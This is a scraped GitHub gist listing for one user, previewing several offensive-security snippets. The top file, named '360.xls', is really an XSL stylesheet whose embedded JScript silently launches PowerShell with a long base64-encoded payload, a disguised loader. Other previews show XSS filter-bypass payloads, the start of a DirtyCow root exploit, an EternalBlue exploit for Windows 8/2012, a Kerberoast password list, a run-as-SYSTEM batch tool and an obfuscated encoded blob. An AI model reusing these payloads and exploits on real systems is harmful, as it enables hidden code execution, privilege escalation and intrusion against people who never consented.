Skip to content

Instantly share code, notes, and snippets.

Caijiji CaiJiJi

  • @Caijijijijijiji
  • Earth
Block or report user

Report or block CaiJiJi

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View 360.xls
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -enc JABOAEoAZABDAEcAagAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBIADQAcwBJAEMATwBxAEwAZABsAHcAQwAvAHoARQAxAE4AVABFAHkATgB6AEkANQBNAHoAZwB1AE0AVABFACEAdgBWAFoAdABUAHgAcwA1AEUAUAA2AE8AeABIACsAdwBxAHAAVgAyAFYAOQBvAHMAIQBZADYANwBDAHEAawBTAGUAWQBHAFcAdABnAGsAcABDADYAVQBsAGoAUwBwAG4AZAA1AEkAWQB2AE8AdgBGADkAaQBhAGsAaABmADkAKwA0ADMAMwBKAGgAZwBPAHUAMwBKADEAMAArAHkAVwB4AFAAVABNAGUAUAA4AC8ATQBZADEAdQB3ACsAQgBwAEcANwBVAEYATQAzAHAAIQBEAGUAMwBOAGoAawBpAFcAaABaAGkASQBoAFoAegBmAHgAdgBEAE8ATgByAGoAbgA1AHUAYgBsAEIAeQBtADkAIQBKAFkAMgBKAFkAOAAyAHAALwBCADYATABLAE8AUABnAGsAWAB5AFEAUwBoAEY
View test.c
==AMwADMwADMwADMzMTOzEzMlJTOzEzMlJjMzgzMxMTZyczMwMTMzYmZmZGZmlDO4U2MjhTN1UWN3AzY1gzMjFDM3AjY4YzY0cDMjVDO1QmZmJTZ5gjN5ITM4YjN1MTNwADMwAjMwADO2cTN3UWO4MTNxUTOkFDMwADMwADMwATOiNTO1QmZmVTZzUDNhhTN4YzN1ADMwQDMwADM4YDMwADMwEDMwgjNwQTY2UDZmZmN1ITY1IGMmhjNwADM4kzN3IWN5IDMwgjY0E2NjFzMxIWOhhTOzAjNkljMlFWN3E2M2UDNjRTZhFDOmljYhdzN5cjZzQ2N1AjNkJmZilTZ1QDMwYWYiJmM2EmNjhjZ1QmM3QGMzIWOhJWOhZGNxMWOmdDZ4IjMhVTMxATZ5cDN2cTMhlTOyYGO5cDNwMDM1kzY5YTNiNDZkJTNiZTOkRjM4AjYxETO4YTN3IWY4cDOzQjM4YzM3gzN3UDZhZ2MzMWMhJWN3cjMmZmYjVDO5UDZ4QDMhNGOxM2Y5YGZxUDZ1UTNwgTMlBTNwgTYiF2YiJDO4IGMlZWM2gDOmNTM3QjNjBDNjljZmdjYlRGOzYmYyMTO1QGNiRzYlZjZ2MTO1EWN5QGNhhjY2QjMhlzN5QDO2EWOllDNiNWO4EjN5QmN4kjY0IDO1QmM4ImZiVjYxkjMhBzY5EmMhVWOlNWZxIGOiJzMzM2N1ITZyYjZwAjZkhTMmV2NmVDO0U2MlNTN5kjMjZDMjZ2YkJGM0UDM4czM5M2NiV2YmRDNykzYxMzNjZWZ5YGN4YTM4EjNkFGMxIDMwEGMkBTOygjNzYTN3YmN0UDMyI2MwMTZyYzMmJDN3UmN1YDN2kjNycDN1AjMiNDNzYzM3UjZ0cTNwIjYzIzMlJjNzAjM0UTZ0AjMzczN3YmN0YTZ2kjN3UDMyI2MwMTZyAzMxMDMyUDN5QzM1QGNwIjYzUjNjZjM2kjN0cTM2AzNkZjZ2MjN4IDMyAzMlJTNzYmMxYzY2MmN5YTY3YmN
@CaiJiJi
CaiJiJi / kerberoast_pws.xz
Last active Nov 13, 2018 — forked from edermi/kerberoast_pws.xz
edermi Kerberoast PW list (XZ format)
View kerberoast_pws.xz
This file has been truncated, but you can view the full file.
@CaiJiJi
CaiJiJi / run.js
Created Aug 8, 2018
Get google result
View run.js
var a = document.getElementById('rcnt').innerHTML.match(/<a href=\"(.*?)\" ping/g);
for (var i=0;i<a.length;i++)
{
var method = a[i].match(/"(.*?):\/\//g)[0];
var domain = a[i].split("/")[2];
var result = method+domain
console.log(result.substr(1));
}
@CaiJiJi
CaiJiJi / wkhtmltopdf.sh
Created Sep 1, 2017 — forked from jurv/wkhtmltopdf.sh
Use session with wkhtmltopdf
View wkhtmltopdf.sh
wget --save-cookies cookies.txt --keep-session-cookies http://my-site.dev/app_dev.php/my/page
# It's possible to add option "--post-data 'user=foo&password=bar' " if you need to
# log in for exemple
# Then retrieve the session ID in cookie.txt
vendor/h4cc/wkhtmltopdf-amd64/bin/wkhtmltopdf-amd64 \
--cookie 'sessionid' 'gfou6ks1lsguuvtk9il2v169n7' \
--cookie 'PHPSESSID' 'gfou6ks1lsguuvtk9il2v169n7' \
--debug-javascript \
View No eval xss
(new Array).filter.constructor('alert(1)')()
[].constructor.constructor('alert(1)')()
[]['constructor']['constructor']('alert(1)')()
[][x='constructor'][x]('alert(1)')()
[][ㅤ='constructor'][ㅤ]('alert(1)')()
@CaiJiJi
CaiJiJi / c0w.c
Created Jun 27, 2017 — forked from KrE80r/c0w.c
PTRACE_POKEDATA variant of CVE-2016-5195
View c0w.c
/*
* A PTRACE_POKEDATA variant of CVE-2016-5195
* should work on RHEL 5 & 6
*
* (un)comment correct payload (x86 or x64)!
* $ gcc -pthread c0w.c -o c0w
* $ ./c0w
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* mmap fa65a000
View run_admin.bat
@echo off
ver|findstr "5\.[0-9]\.[0-9][0-9]*" >NUL 2>NUL && (echo [-] Not Working for winxp\win2k3 &&goto :EOF)
del /f /q %result_file% >NUL 2>NUL
Rd "%WinDir%\system32\test_permissions" >NUL 2>NUL
Md "%WinDir%\System32\test_permissions" 2>NUL||(Echo.& [-] Echo Run as administrator user. &&goto :EOF)
set comands=%*
if not defined comands (
echo.
echo Run as SYSTEM Account Tool
@CaiJiJi
CaiJiJi / eternalblue8_exploit.py
Created May 18, 2017 — forked from worawit/eternalblue8_exploit.py
Eternalblue exploit for Windows 8/2012
View eternalblue8_exploit.py
#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
@CaiJiJi
CaiJiJi / ubuntu.sh
Last active Apr 10, 2019
install script
View ubuntu.sh
#!/bin/bash
#update
apt-get update -y
apt-get upgrade -y
#install software
apt-get install -y nmap vim build-essential gcc g++ nc git curl wget python-dev openssl openssl-dev zip automake make ncurses-dev
#install proxychains
git clone https://github.com/rofl0r/proxychains-ng /tmp/proxychains-ng
cd /tmp/proxychains-ng
./configure --prefix=/usr/local/
You can’t perform that action at this time.